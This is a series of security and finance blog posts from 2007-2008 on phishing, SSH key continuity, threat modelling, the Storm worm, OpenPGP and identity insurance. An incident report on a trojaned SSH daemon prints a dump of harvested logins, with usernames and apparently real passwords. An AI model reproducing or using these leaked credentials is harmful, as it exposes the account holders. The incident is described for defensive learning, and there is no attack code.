    ...these latest messages masquerade as an official subpoena requiring the recipient to appear before a federal grand jury. The emails correctly address CEOs and other high-ranking executives by their full name and include their phone number and company name, according to Matt Richard, director of rapid response at iDefense, a division of VeriSign that helps protect financial institutions from fraud. ...

    About 2,000 executives took the bait on Monday, and an additional 70 have fallen for the latest scam, Richard said. Operating under the assumption that as many as 10 percent of recipients fell for the ruse, he estimated that 21,000 executives may have received the email. Only eight of the top 35 anti-virus products detected the malware on Monday, and on Wednesday, only 11 programs were flagging the new payload, which has been modified to further evade being caught.

    I find 10% to be exceptionally large, but, OK, it's a number, and we collect numbers!

    Disclosure for them: Verisign sells an an anti-phishing technology called secure browsing, or at least the certificates part of that. (Hence they and you are interested in phishing statistics.) Due to problems in the browser interface, they and other CAs now also sell a "green" version called Extended Validation. This -- encouragingly -- fixes some problems with the older status quo, because more info is visible for users to assess risks (a statement by the CA, more or less). Less encouragingly, EV may trade future security for current benefit, because it further cements the institutional structure of secure browsing, meaning that as attackers spin faster in their OODA loops, browsers will spin slower around the attackers.

    Luckily, Johnath reports that further experiments are due in Firefox 3.1, so there is still some spinning going on:

    Here’s my initial list of the 3 things I care most about, what have I missed?

    1. Key Continuity Management

    Key continuity management is the name for an approach to SSL certificates that focuses more on “is this the same site I saw last time?” instead of “is this site presenting a cert from a trusted third party?” Those approaches don’t have to be mutually exclusive, and shouldn’t in our case, but supporting some version of this would let us deal more intelligently with crypto environments that don’t use CA-issued certificates.

    Jonath's description sells it short, perhaps for political reasons. KCM is useful when the user knows more than the CA, which unfortunately is most of the time. This might mean that the old solution should be thrown out in favour of KCM, but the challenge lies in extracting the user's knowledge in an efficacious way. As the goal with modern software is to never bother the user then this is much more of a challenge than might be first thought. Hence, as he suggests, KCM and CA-certified browsing will probably live side by side for some time.

    If there was a list of important security fixes for phishing, I'd say it should be this: UI fixes, KCM and TLS/SNI. Firefox is now covering all three of those bases. Curiously, Johnath goes on to say:

    The first is for me to get a better understanding of user certificates. In North America (outside of the military, at least) client certificates are not a regular matter of course for most users, but in other parts of the world, they are becoming downright commonplace. As I understand it, Belgium and Denmark already issue certs to their citizenry for government interaction, and I think Britain is considering its options as well. We’ve fixed some bugs in that UI in Firefox 3, but I think it’s still a second-class UI in terms of the attention it has gotten, and making it awesome would probably help a lot of users in the countries that use them. If you have experience and feedback here, I would welcome it.

    Certainly it is worthy of attention (although I'm surprised about the European situation) because they strictly dominate over username-passwords in such utterly scientific, fair and unbiased tests like the menace of the chocolate bar. More clearly, if you are worried about eavesdropping defeating your otherwise naked and vulnerable transactions, client-side private keys are the start of the way forward to proper financial cryptography.

    I've found x.509 client certificates easier to use than expected, but they are terribly hard to install into the browser. There are two real easy fixes for this: 1. allow the browser to generate a self-signed cert as a default, so we get more widespread use, and 2. create some sort of CA <--> browser protocol so that this interchange can happen with a button push. (Possible 3., I suspect there may be some issues with SSL and client certs, but I keep getting that part wrong so I'll be vague this time!)

    Which leaves us inevitably and scarily to our other big concern: Browser hardening against MITB. (How that is done is ... er ... beyond scope of a blog post.) What news there?

    Posted by iang at 12:02 PM | Comments (1) | TrackBack

    April 07, 2008

    An idea for opportunistic public key exchange

    In our ELTEcrypt research group [writes Dani Nagy], we discussed opportunistic public key exchange from a cost-benefit point of view and came up with an important improvement over the existing schemes (e.g. ssh), which, I think, must be advertised as broadly as possible. It may even merit a short paper to some conference, but for now, I would like to ask you to publish it in your blog.

    Opportunistic public key exchange is when two communicating parties perform an unauthenticated key exchange before the first communication session, assume that this key is trustworthy and then only verify that the same party uses the same key every time. This lowers the costs of defense significantly by not imposing authentication on the participants, while at the same time it does not significantly lower the cost of the dominant attack (doing MITM during the first communication session is typically not the dominant attack). Therefore, it is a Pareto-improvement over an authenticated PKI.

    One successful implementation of this principle is ssh. However, it has one major flaw, stemming from misplaced costs: when an ssh host is re-installed or replaced by a new one, the cost of migrating the private key of the host is imposed on the host admin, while most of the costs resulting from not doing so are imposed on the clients.

    In the current arrangement, when a new system is installed, the ssh host generates itself a new key pair. Migrating the old key requires extra work on the system administrator's part. So, he probably won't do it.

    If the host admin fails to migrate the key pair, clients will get a frightening error message that won't let them do their job, until they exert significant effort for removing the "offending" old public key from their key cache. This is their most straightforward solution, which both weakens their security (they lose all protection against MITM) and punishes them for the host admin's mistake.

    This could be improved in the following way: if the client detects that the host's public key has changed, instead of quitting after warning the user, it allows the user to accept the new key temporarily for this one session with hitting "yes" and SENDS AN EMAIL TO THE SYSTEM ADMINISTRATOR.

    Such a scheme metes out punishment where it is due. It does not penalize the client too much for the host admin's mistake, and provides the latter with all the right incentives to do his duty (until he fixes the migration problem, he will be bombarded by emails by all the clients and the most straightforward solution to his problem is to migrate the key, which also happens to be the right thing to do).

    As an added benefit, in some attack scenarios, the host admin will learn about an ongoing attack.

    Posted by iang at 02:34 PM | Comments (1) | TrackBack

    March 09, 2008

    The Trouble with Threat Modelling

    We've all heard it a hundred times: what's your threat model? But how many of us have been able to answer that question? Sadly, less than we would want, and I myself would not have a confident answer to the question. As writings on threat modelling are few and far between, it is difficult to draw a hard line under the concept. Yet more evidence of gaping holes in the security thinker's credibility.

    Adam Shostack has written a series of blog posts on threat modelling in action at Microsoft (read in reverse order). It's good: readable, and a better starting point, if you need to do it, than anything else I've seen. Here are a couple of plus points (there are more) and a couple of criticisms:

    Surprisingly, the approach is written to follow the practice that it is the job of the developers to do the security work:

    We ask feature teams to participate in threat modeling, rather than having a central team of security experts develop threat models. There’s a large trade-off associated with this choice. The benefit is that everyone thinks about security early. The cost is that we have to be very prescriptive in how we advise people to approach the problem. Some people are great at “think like an attacker,” but others have trouble. Even for the people who are good at it, putting a process in place is great for coverage, assurance and reproducibility. But the experts don’t expose the cracks in a process in the same way as asking everyone to participate.

    What is written between the lines is that the central security team at Microsoft provides a moderator or leader for the process. This is good thinking, as it brings in the experience, but it still makes the team do the work. I wonder how viable this is for general practice? Outside the megacorps where they have made this institutional mindshift happen, would it be possible to ask a security expert to come in, swallow 2 decades of learning, and be a leader of a process, not a doer of a process?

    There are many ramifications of the above discovery, and it is fascinating to watch them bounce around the process. I'll just repeat one here: simplification! Adam hit the obvious problem that if you take the mountain to Mohammad, it should be a small mountain. Developers are employed to write good code, and complex processes just slow that down, and so an aggressive simplification was needed to come up with a very concise model. A more subtle point is that the moderator wants to impart something as well as get through the process, and complexity will kill any retention. Result: one loop on one chart, and one table.

    The posts are not a prescription on how to do the whole process, and indeed in some places, they are tantalisingly light (we can guess that it is internal PR done through a public channel). With that understanding, they represent a great starting point.

    There are two things that I would criticise. One major error, IMHO: Repudiation. This was an invention by PKI-oriented cryptographers in the 1990s or before, seeking yet another marketing point for the so-called digital signature. It happens to be wrong. Not only is the crypto inadequate to the task, the legal and human processes implied by the Repudiation concept are wrong. Not just misinformed or misaligned, they are reversed from reality, and in direct contradiction, so it is no surprise that after a decade of trying, Non-Repudiation has never ever worked in real life.

    It is easy to fix part of the error. Where you see Non-Repudiation, put Auditing (in the sense of logging) or Evidence (if looking for a more juridical flavour). What is a little bit more of a challenge is how to replace "Repudation" as the name of the attack ... which on reflection is part of the error. The attack alleged as repudiation is problematic, because, before it is proven one way or the other, it is not possible to separate a real attack from a mistake. Then, labelling it as an attack creates a climate of guilty until proven innocent, but without the benefit of evidence tuned to proving innocence. This inevitably leads to injustice which leads to mistrust and finally, (if a fair and open market is in operation) rejection of the technology.

    Instead, think of it as an attack born of confusion or uncertainty. This is a minor issue when inside one administrative or trust boundary, because one person elects to carry the entire risk. But it becomes a bigger risk when crossing into different trust areas. Then, different agents are likely to call a confusing situation by different viewpoints (incentives differ!).

    At this point the confusion develops into a dispute, and that is the real name for the attack. To resolve the dispute, add auditing / logging and evidence. Indeed, signatures such as hashes and digsigs make mighty fine evidence so it might be that a lot of the work can be retained with only a little tweaking.

    I then would prefer to see the threat - property matrix this way:

    Threat Security Property
    Spoofing-->Authentication
    Tampering-->Integrity
    Dispute-->Evidence
    Information Disclosure-->Encryption
    Denial of Service-->Availability
    Elevation of Privilege-->Authorisation

    A minor criticism I see is in labelling. I think the whole process is not threat modelling but security modelling. It's a minor thing, which Adam neatly disposes of by saying that arguing about terms is not only pointless but distracts from getting the developers to do the job. I agree. If we end up disposing of the term 'security modelling' then I think that is a small price to pay to get the developers a few steps further forward in secure development.

    Posted by iang at 09:04 AM | Comments (3) | TrackBack

    February 17, 2008

    Say it ain't so? MITM protection on SSH shows its paces...

    For a decade now, SSH has successfully employed a simple opportunistic protection model that solved the shared-key problem. The premise is quite simple: use the information that the user probably knows. It does this by caching keys on first sight, and watching for unexpected changes. This was originally intended to address the theoretical weakness of public key cryptography called MITM or man-in-the-middle.

    Critics of the SSH model, a.k.a. apologists for the PKI model of the Trusted Third Party (certificate authority) have always pointed out that this simply leaves SSH open to a first-time MITM. That is, when some key changes or you first go to a server, it is "unknown" and therefore has to be established with a "leap of faith."

    The SSH defenders claim that we know much more about the other machine, so we know when the key is supposed to change. Therefore, it isn't so much a leap of faith as educated risk-taking. To which the critics respond that we all suffer from click-thru syndrome and we never read those messages, anyway.

    Etc etc, you can see that this argument goes round and round, and will never be solved until we get some data. So far, the data is almost universally against the TTP model (recall phishing, which the high priests of the PKI have not addressed to any serious extent that I've ever seen). About a year or two back, attack attention started on SSH, and so far it has withstood difficulties with no major or widespread results. So much so that we hear very little about it, in contrast to phishing, which is now a 4 year flood of grief.

    After which preamble, I can now report that I have a data point on an attack on SSH! As this is fairly rare, I'm going to report it in fullness, in case it helps. Here goes:

    Yesterday, I ssh'd to a machine, and it said:

    zhukov$ ssh some.where.example.net
    WARNING: RSA key found for host in .ssh/known_hosts:18
    RSA key fingerprint 05:a4:c2:cf:32:cc:e8:4d:86:27:b7:01:9a:9c:02:0f.
    The authenticity of host can't be established but keys
    of different type are already known for this host.
    DSA key fingerprint is 61:43:9e:1f:ae:24:41:99:b5:0c:3f:e2:43:cd:bc:83.
    Are you sure you want to continue connecting (yes/no)?
    

    OK, so I am supposed to know what was going on with that machine, and it was being rebuilt, but I really did not expect SSH to be effected. The ganglia twitch! I asked the sysadm, and he said no, it wasn't him. Hmmm... mighty suspicious.

    I accepted the key and carried on. Does this prove that click-through syndrome is really an irresistable temptation and the archilles heel of SSH, and even the experienced user will fall for it? Not quite. Firstly, we don't really have a choice as sysadms, we have to get in there, compromise or no compromise, and see. Secondly, it is ok to compromise as long as we know it, we assess the risks and take them. I deliberately chose to go ahead in this case, so it is fair to say that I was warned, and the SSH security model did all that was asked of it.

    Key accepted (yes), and onwards! It immediately came back and said:

    iang@somewhere's password:

    Now the ganglia are doing a ninja turtle act and I'm feeling very strange indeed: The apparent thought of being the victim of an actual real live MITM is doubly delicious, as it is supposed to be as unlikely as dying from shark bite. SSH is not supposed to fall back to passwords, it is supposed to use the keys that were set up earlier. At this point, for some emotional reason I can't further divine, I decided to treat this as a compromise and asked my mate to change my password. He did that, and then I logged in.

    Then we checked. Lo and behold, SSH had been reinstalled completely, and a little bit of investigation revealed what the warped daemon was up to: password harvesting. And, I had a compromised fresh password, whereas my sysadm mates had their real passwords compromised:

    $ cat /dev/saux foo@...208 (aendermich) [Fri Feb 15 2008 14:56:05 +0100] iang@...152 (changeme!) [Fri Feb 15 2008 15:01:11 +0100] nuss@...208 (43Er5z7) [Fri Feb 15 2008 16:10:34 +0100] iang@...113 (kash@zza75) [Fri Feb 15 2008 16:23:15 +0100] iang@...113 (kash@zza75) [Fri Feb 15 2008 16:35:59 +0100] $

    The attacker had replaced the SSH daemon with one that insisted that the users type in their passwords. Luckily, we caught it with only one or two compromises.

    In sum, the SSH security model did its job. This time! The fallback to server-key re-acceptance triggered sufficient suspicion, and the fallback to passwords gave confirmation.

    As a single data point, it's not easy to extrapolate but we can point at which direction it is heading:

    • the model works better than its absence would, for this environment and this threat.
    • This was a node threat (the machine was apparently hacked via dodgy PHP and last week's linux kernel root exploit).
    • the SSH model was originally intended to counter an MITM threat, not a node threat.
    • because SSH prefers keys to passwords (machines being more reliable than humans) my password was protected by the default usage,
    • then, as a side-effect, or by easy extension, the SSH model also protects against a security-mode switch.
    • it would have worked for a real MITM, but only just, as there would only have been the one warning.
    • But frankly, I don't care. The compromise of the node was far more serious,
    • and we know that MITM is the least cost-effective breach of all. There is a high chance of visibility and it is very expensive to run.
    • If we can seduce even a small proportion of breach attacks across to MITM work then we have done a valuable thing indeed.

    In terms of our principles, we can then underscore the following:

    • We are still a long way away from seeing any good data on intercept over-the-wire MITMs. Remember: the threat is on the node. The wire is (relatively) secure.
    • In this current context, SSH's feature to accept passwords, and fallback from key-auth to password-auth, is a weakness. If the password mode had been disabled, then an entire area of attack possibilities would have been evaded. Remember: There is only one mode, and it is secure.
    • The use of the information known to me saved me in this case. This is a good example of how to use the principle of Divide and Conquer. I call this process "bootstrapping relationships into key exchanges" and it is widely used outside the formal security industry.

    All in all, SSH did a good job. Which still leaves us with the rather traumatic job of cleaning up a machine with 3-4 years of crappy PHP applications ... but that's another story.



    For those wondering what to do about today's breach, it seems so far:

    • turn all PHP to secure settings. throw out all old PHP apps that can't cope.
    • find an update for your Linux kernel quickly
    • watch out for SSH replacements and password harvesting
    • prefer SSH keys over passwords. The compromises can be more easily cleaned up by re-generating and re-setting the keys, they don't leapfrog so easily, and they aren't so susceptible to what is sometimes called "social engineering" attacks.
    Posted by iang at 04:26 PM | Comments (7) | TrackBack

    February 02, 2008

    SocGen - the FC solution, the core failure, and some short term hacks...

    Everyone is talking about Société Générale and how they managed to mislay EUR 4.7bn. The current public line is that a rogue trader threw it all away on the market, but some of the more canny people in the business don't buy it.

    One superficial question is how to avoid this dilemma?

    That's a question for financial cryptographers, I say. If we imagine a hard payment system is used for the various derivative trades, we would have to model the trades as two or more back-to-back payments. As they are positions that have to be made then unwound, or cancelled off against each other, this means that each trader is an issuer of subsidiary instruments that are combined into a package that simulates the intent of the trade (theoretical market specialists will recall the zero-coupon bond concept as the basic building block).

    So, Monsieur Kerviel would have to issue his part in the trades, and match them to the issued instruments of his counterparty (whos name we would dearly love to know!). The two issued instruments can be made dependent on each other, an implementation detail we can gloss over today.

    Which brings us to the first part: fraudulent trades to cover other trades would not be possible with proper FC because it is not possible to forge the counterparty's position under triple-entry systems (that being the special magic of triple-entry).

    Higher layer issues are harder, because they are less core rights issues and more human constructs, so they aren't as yet as amenable to cryptographic techniques, but we can use higher layer governance tricks. For example, the size of the position, the alarms and limits, and the creation of accounts (secret or bogus customers). The backoffice people can see into the systems because it is they who manage the issuance servers (ok, that's a presumption). Given the ability to tie down every transaction, we are simply left with the difficult job of correctly analysing every deviation. But, it is at least easier because a whole class of errors is removed.

    Which brings us to the underlying FC question: why not? It was apparent through history, and there are now enough cases to form a pattern, that the reason for the failure of FC was fundamentally that the banks did not want it. If anything, they'd rather you dropped dead on the spot than suggest something that might improve their lives.

    Which leads us to the very troubling question of why banks hate to do it properly. There are many answers, all speculation, and as far as I know, nobody has done research into why banks do not employ the stuff they should if they responded to events as other markets do. Here are some speculative suggestions:

    • banks love complexity
    • more money is made in complexity because the customer pays more, and the margins are higher for higher payments
    • complexity works as a barrier to entry
    • complexity hides funny business, which works as well for naughty banks, tricky managers, and rogue traders. It creates jobs, makes staffs look bigger. Indeed it works well for everyone, except outsiders.
    • compliance helps increase complexity, which helps everything else, so compliance is fine as long as all have to suffer the same fate.
    • banks have a tendency to adopt one compatible solution across the board, and cartels are slow to change
    • nobody is rewarded for taking a management risk (only a trading risk)
    • banks are not entrepreneurial or experimental
    • HR processes are steam-age, so there aren't the people to do it even if they wanted to.

    Every one of those reasons is a completely standard malaise which strikes every company, but not other industries. The difference is competition; in every other industry, the competition would eat up the poorer players, but in banking, it keeps the poorer players alive. So the #1 fundamental reason why rogue traders will continue to eat up banks, one by one, is lack of competitive pressures to do any better.

    And of course, all these issues feed into each other. Given all that, it is hard to see how FC will ever make a difference from inside; the only way is from outside, to the extent that challengers find an end-run around the rules for non-competition in banking.

    What then would we propose to the bank to solve the SocGen dilemma as a short term hack? There are two possibilities that might be explored.

    1. Insurance for rogue traders. Employ an external insurer and underwriter to provide a 10bn policy on such events. Then, let the insurer dictate systems & controls. As more knowledge of how to stop the event comes in, the premiums will drop to reward those who have the better protection.

      This works because it is an independent and financially motivated check. It also helps to start the inevitable shift of moving parts of regulation from the current broken 20th century structure over to a free market governance mechanism. That is, it is aligned with the eventual future economic structure.


    2. Separate board charged with governance of risky (banking) assets. As the current board structure of banking is that the directors cannot and will not see into the real positions, due to all the above and more, it seems that as time goes on, more and more systematic and systemic conditions will build up. Managing these is more than a full time job, and more than an ordinary board can do.

      So outsource the whole lot of risk governance to specialists in a separate board-level structure. This structure should have visibility of all accounts, all SPEs, all positions, and should also be the main conduit to the regulator. It has to be equal to the business board, because it has to have the power to make it happen.

      The existing board maintains the business side: HR, markets, products, etc. This would nicely divide into two the "special" area of banking from the "general" area of business. Then, when things go wrong, it is much easier to identify who to sack, which improves the feedback to the point where it can be useful. It also puts into more clear focus the specialness of banks, and their packaged franchises, regulatory costs and other things.

    Why or how these work is beyond scope of a blog. Indeed, whether they work is a difficult experiment to run, and given the Competition finding above, it might be that we do all this, and still fail. But, I'd still suggest them, as both those ideas can be rolled out in a year, and the current central banking structure has at least another decade to run, and probably two, before the penny drops, and people realise that the regulation is the problem, not the solution.

    (PS: Jim invented the second one!)

    Posted by iang at 06:31 PM | Comments (2) | TrackBack

    January 08, 2008

    UK data breach counts another coup!

    The UK data breach a month or two back counted another victim: one Jeremy Clarkson. The celebrated British "motormouth" thought that nobody should really worry about the loss of the disks, because all the data is widely available anyway. To stress this to the island of nervous nellies, he posted his bank details in the newspaper.

    Back in November, the Government lost two computer discs containing half the population's bank details. Everyone worked themselves into a right old lather about the mistake but I argued we should all calm down because the details in question are to be found on every cheque we hand out every day to every Tom, Dick and cash and carry.

    Unfortunately, some erstwhile scammer decided to take him to task at it and signed him up for a contribution to a good charity. (Well, I suppose it's good, all charities and non-profits are good, right?) Now he writes:

    I opened my bank statement this morning to find out that someone has set up a direct debit which automatically takes £500 from my account. I was wrong and I have been punished for my mistake.

    Contrary to what I said at the time, we must go after the idiots who lost the discs and stick cocktail sticks in their eyes until they beg for mercy.

    What can we conclude from this data point of one victim? Lots, as it happens.

    1. Being a victim of the *indirect* nature continues to support the thesis that security is a market for silver bullets. That is, the market is about FUD, not security in any objective sense.
    2. (writing for the non-Brit audience here,) Jeremy Clarkson is a comedian. Comments from comedians will do more to set the agenda on security than any 10 incumbents (I hesitate to use more conventional terms). There has to be some pithy business phrase about this, like, when your market is defined by comedians, it's time for the, um, incumbents to change jobs.
    3. Of course, he's right on both counts. Yes, there is nothing much to worry about, individually, because (a) the disks are lost, not stolen, and (b) the data is probably shared so willingly that anyone who wants it already has it. (The political question of whether you could trust the UK government to tie its security shoelaces is an entirely other matter...)

      And, yes, he was wrong to stick his neck out and say the truth.


    4. So why didn't the bank simply reverse the transaction? I'll leave that briefly as an exercise to the reader, there being two good reasons that I can think of, after the click.



    a. because he gave implied permission for the transactions by posting his details, and he breached implied terms of service!

    b. because he asked them not to reverse the transaction, as now he gets an opportunity to write another column. Cheap press.

    Hat-tip to JP! And, I've just noticed DigitalMoney's contribution for another take!

    Posted by iang at 04:13 AM | Comments (2) | TrackBack

    November 11, 2007

    Oddly good news week: Google announces a Caps library for Javascript

    Capabilities is one of the few bright spots in theoretical computing. In Internet software terms, caps can be simply implemented as nymous public/private keys (that is, ones without all that PKI baggage). The long and deep tradition of capabilities is unchallenged seriously in the theory literature.

    It is heavily challenged in the practical world in two respects: the (human) language is opaque and the ideas are simply not widely deployed. Consider this personal example: I spent many years trying to figure out what caps really was, only to eventually discover that it was what I was doing all along with nymous keys. The same thing happens to most senior FC architects and systems developments, as they end up re-inventing caps without knowing it: SSH, Skype, Lynn's x95.9, and Hushmail all have travelled the same path as Gary Howland's nymous design. There's no patent on this stuff, but maybe there should have been, to knock over the ivory tower.

    These real world examples only head in the direction of caps, as they work with existing tools, whereas capabilities is a top-down discipline. Now Ben Laurie has announced that Google has a project to create a Caps approach for Javascript (hat tip to JPM, JQ, EC and RAH :).

    Rather... than modify Javascript, we restrict it to a large subset. This means that a Caja program will run without modification on a standard Javascript interpreter - though it won’t be secure, of course! When it is compiled then, like CaPerl, the result is standard Javascript that enforces capability security. What does this mean? It means that Web apps can embed untrusted third party code without concern that it might compromise either the application’s or the user’s security.

    Caja also means box in Spanish which is a nice cross-over as capabilities is like the old sandbox ideas of Java applet days. What does this mean, other than the above?

    We could also point to the Microsoft project Cardspace (was/is now Inforcard) and claim parallels, as that, at a simplistic level, implements a box for caps as well. Also, the HP research labs have a constellation of caps fans, but it is not clear to me what application channel exists for their work.

    There are then at least two of the major financed developers pursuing a path guided by theoretical work in secure programming.

    What's up with Sun, Mozilla, Apple, and the application houses, you may well ask! Well, I would say that there is a big difference in views of security. The first-mentioned group, a few tiny isolated teams within behemoths, are pursuing designs, architectures and engineering that is guided by the best of our current knowledge. Practically everyone else believes that security is about fixing bugs after pushing out the latest competitive feature (something I myself promote from time to time).

    Take Sun (for example, as today's whipping boy, rather than Apple or Mozo or the rest of Microsoft, etc).

    They fix all their security bugs, and we are all very grateful for that. However, their overall Java suite becomes more complex as time goes on, and has had no or few changes in the direction of security. Specifically, they've ignored the rather pointed help provided by the caps school (c.f., E, etc). You can see this in J2EE, which is a melting pot of packages and add-ons, so any security it achieves is limited to what we might called bank-level or medium-grade security: only secure if everything else is secure. (Still no IPC on the platform? Crypto still out of control of the application?)

    Which all creates 3 views;

    1. low security, which is characterised by the coolness world of PHP and Linux: shove any package in and smoke it.
    2. medium security, characterised by banks deploying huge numbers of enterprise apps that are all at some point secure as long as the bits around them are secure.
    3. high security, where the applications are engineered for security, from ground up.

    The Internet as a whole is stalled at the 2nd level, and everyone is madly busy fixing security bugs and deploying tools with the word "security" in them. Breaking through the glass ceiling and getting up to high security requires deep changes, and any sign of life in that direction is welcome. Well done Google.

    Posted by iang at 09:51 AM | Comments (4) | TrackBack

    November 08, 2007

    H1: OpenPGP becomes RFC4880. Consider Hypothesis #1: The One True Cipher Suite

    Some good news: after a long hard decade, OpenPGP is now on standards track. That means that it is a standard, more or less, for the rest of us, and the IETF process will make it a "full standard" according to their own process in due course.

    RFC4880 is now OpenPGP and OpenPGP is now RFC4880. Hooray!

    Which finally frees up the OpenPGP community to think what to do next?

    Where do we go from here? That's an important question because OpenPGP provides an important base for a lot of security work, and a lot of security thinking, most of which is good and solid. The OpenPGP web of trust is one of the seminal security ideas, and is used by many products (referenced or not).

    However, it is fair to say that OpenPGP is now out of date. The knowledge was good around the early 1990s, and is ready for an update. (I should point out that this is not as embarrassing as it sounds, as one competitor, PKI/x.509, is about 30 years out of date, deriving its model from pre-Internet telco times, and there is no recognition in that community of even the concept of being out of date.)

    Rising to the challenge, the OpenPGP working group are thinking in terms of remodelling the layers such that there is a core/base component, and on top of that, a major profile, or suite, of algorithms. This will be a long debate about serious software engineering, security and architecture, and it will be the most fun that a software architect can have for the next ten years. In fact, it will be so much fun that it's time to roll out my view, being hypothesis number one:


    H1: The One True Cipher Suite

    In cryptoplumbing, the gravest choices are apparently on the nature of the cipher suite. To include latest fad algo or not? Instead, I offer you a simple solution. Don't.

    There is one cipher suite, and it is numbered Number 1.

    Cypersuite #1 is always negotiated as Number 1 in the very first message. It is your choice, your ultimate choice, and your destiny. Pick well.

    If your users are nice to you, promise them Number 2 in two years. If they are not, don't. Either way, do not deliver any more cipher suites for at least 7 years, one for each hypothesis.

    And then it all went to pot...

    We see this with PGP. Version 2 was quite simple and therefore stable -- there was RSA, IDEA, MD5, and some weird padding scheme. That was it. Compatibility arguments were few and far between. Grumbles were limited to the padding scheme and a few other quirks.

    Then came Versions 3-8, and it could be said that the explosion of options and features and variants caused more incompatibility than any standards committee could have done on its own.

    Avoid the Champagne Hangover

    Do your homework up front.

    Pick a good suite of ciphers, ones that are Pareto-Secure, and do your best to make the combination strong. Document the short falls and do not worry about them after that. Cut off any idle fingers that can't keep from tweaking. Do not permit people to sell you on the marginal merits of some crazy public key variant or some experimental MAC thing that a cryptographer knocked up over a weekend or some minor foible that allows an attacker to learn your aunty's birth date after asking a million times.

    Resist the temptation. Stick with The One.


    Posted by iang at 11:08 AM | Comments (0) | TrackBack

    October 25, 2007

    My fake passports and me

    Rasika pointed to a serious attempt to research false passports for all of EUs countries by Panorama, a British soft-investigation TV series:

    I am attending an informal seminar led by a passport dealer, along with six hopefuls who are living illegally in the UK. We are told that all our problems can be solved by a "high quality" Czech passport. It will take just two weeks to obtain and cost a mere £1,500.

    This may already sound surreal enough, but it was just the beginning of my journey across Europe in search of fake passports from all 25 EU member states.

    What's lacking here is hard costs of the passports she actually did obtain. That's why it is soft investigation.

    I am directed to somebody who introduces me to somebody else, and finally I end up face to face with two innocent-looking pensioners. They say that for just 300 euros they can get me a Polish passport in less than 24 hours.

    This deal falls through, but another dealer has delivered Polish and Lithuanian passports, complete with my own photos and two different identities.

    But the breadth of the success makes it worthy of reporting:

    It took me just five months to get 20 fake EU passports. Some of them were of the very best quality and were unlikely to be spotted as fakes by even the most stringent of border controls.

    This is probably a good time to remind FC readers that you can find a long running series on the cost of false identity, taken from news articles that specify actual costs, here in the blog. Also note that on the Panorama show there is a video segment, but it is in a format that I cannot read for some reason.

    Update: in one of the accompanying articles:

    They ranged in price from just #250 to more than #1,500. Some were provided within several days, while others took weeks.

    (Currency is unclear, it was shown as #.) Also, from one of the accompanying articles:

    Police believe they were on the brink of producing 12,000 fake EU passports - potentially earning them £12m, when they were arrested in November 2005. .... Det Insp Nick Downing, who led the investigation, said the passports could have sold for up to £1,000 each.

    Same as FC.

    Posted by iang at 06:59 AM | Comments (5) | TrackBack

    October 05, 2007

    Storm Worm signals major new shift: a Sophisticated Enemy

    I didn't spot it when Peter Gutmann called it the world's biggest supercomputer (I thought he was talking about a game or something ...). Now John Robb pointed to Bruce Schneier who has just published a summary. Here's my paraphrasing:

    • Patience ...
    • Separation of Roles ...
    • Redundant Roles ...
    • No damage to host ...
    • p2p communications to control nodes ...
    • morphing of standard signatures (DNS, code) ...
    • probing (in military recon terms) past standard defences ...
    • knowledge of the victim's weaknesses ...
    • suppression of the enemy's recon ...

    Bruce Schneier reports that the anti-virus companies are pretty much powerless, and runs through a series of possible defences. I can think of a few too, and I'm sure you can as well. No doubt the world's security experts (cough) will spend a lot of time on this question.

    But, step back. Look at the big picture. We've seen all these things before. Those serious architects in our world (you know who you are) have even built these systems before.

    But: we've never seen the combination of these tactics in an attack .

    This speaks to a new level of sophistication in the enemy. In the past, all the elements were basic. Better than script kiddie, but in that area. What we had was industrialisation of the phishing industry, a few years back, which spoke to an increasing level of capital and management involved.

    Now we have some serious architects involved. This is in line with the great successes of computer science: Unix, the Internet, Skype all achieved this level of sophistication in engineering, with real results. I tried with Ricardo, Lynn&Anne tried with x9.59. Others as well, like James and the Digicash crew. Mojo, Bittorrent and the p2p crowd tried it too.

    So we have a new result: the enemy now has architects as good as our best.

    As a side-issue, well predicted, we can also see the efforts of the less-well architected groups shown for what they are. Takedown is the best strategy that the security-shy banks have against phishing, and that's pretty much a dead duck against the above enemy. (Banks with security goals have moved to SMS authentication of transactions, sometimes known as two channel, and that will still work.)

    But that's a mere throwaway for the users. Back to the atomic discussion of architecture. This is an awesome result. In warfare, one of the dictums is, "know yourself and win half your battles. Know your enemy and win 99 of 100 battles."

    For the first time in Internet history, we now have a situation where the enemy knows us, and is equal to our best. Plus, he's got the capital and infrastructure to build the best tools against us.

    Where are we? If the takedown philosophy is any good data point, we might know ourselves but we know little about the enemy. But, even if we know ourselves, we don't know our weaknesses, and our strengths are useless.

    What's to be done? Bruce Schneier said:

    Redesigning the Microsoft Windows operating system would work, but that's ridiculous to even suggest.

    As I suggested in last year's roundup, we were approaching this decision. Start re-writing, Microsoft. For sake of fairness, I'd expect that Linux and Apple will have a smaller version of the same problem, as the 1970s design of Unix is also a bit out-dated for this job.

    Posted by iang at 07:07 AM | Comments (3) | TrackBack

    September 11, 2007

    If Insurance is the Answer to Identity, what's the Question?

    Over on Second Life, they (LL) are trying to solve a problem by providing an outsourced service on identity verification with a company called Integrity. This post puts it in context (warning, it's quite long, longer even than an FC post!):

    So now we understand better what this is all about. In effect, Integrity does not really provide “just a verification service”. Their core business is actually far more interesting: they buy LL’s liability in case LL gets a lawsuit for letting minors to see “inappropriate content”. Even more interesting is that LL does not need to worry about what “inappropriate content” means: this is a cultural question, not a philosophic one, but LL does not need to care. Whatever lawsuits will come LL’s way, they will simply get Integrity to pay for them.

    Put into other words: Integrity is an insurance company. In this day and age where parents basically don’t care what their children are doing, and blame the State for not taking care of a “children-friendly environment” by filing lawsuits against “the big bad companies who display terrible content”, a new business opportunity has arisen: selling insurance against the (albeit remote) possibility that you get a lawsuit for displaying “inappropriate content”.

    (Shorter version maybe here.)

    Over on Perilocity, which is a blog about the insurance world, John S. Quarterman points at the arisal of insurance to cover identity theft from a company called LifeLock.

    I have to give them credit for honesty, though: LifeLock admits right out that the main four preventive things they do you could do for yourself. Beyond that, the main substance they seem to offer is essentially an insurance package:

    "If your Identity is stolen while you are our client, we’re going to do whatever it takes to recover your good name. If you need lawyers, we’re going to hire the best we can find. If you need investigators, accountants, case managers, whatever, they’re yours. If you lose money as a result of the theft, we’re going to give it back to you."

    For $110/year or $10/month, is such an insurance policy overpriced, underpriced, or what?

    It's possible easier for the second provider to be transparent and open. After all they are selling insurance for stuff that is a validated disaster. The first provider is trying to cover a problem which is not yet a disaster, so there is a sort of nervousness about baring all.

    How viable is this model? The first thing would be to ask: can't we fix the underlying problem? For identity theft, apparently not, Americans want their identity system because it gives them their credit system, and there aren't too many Americans out there that would give up the right to drive their latest SUV out of the forecourt.

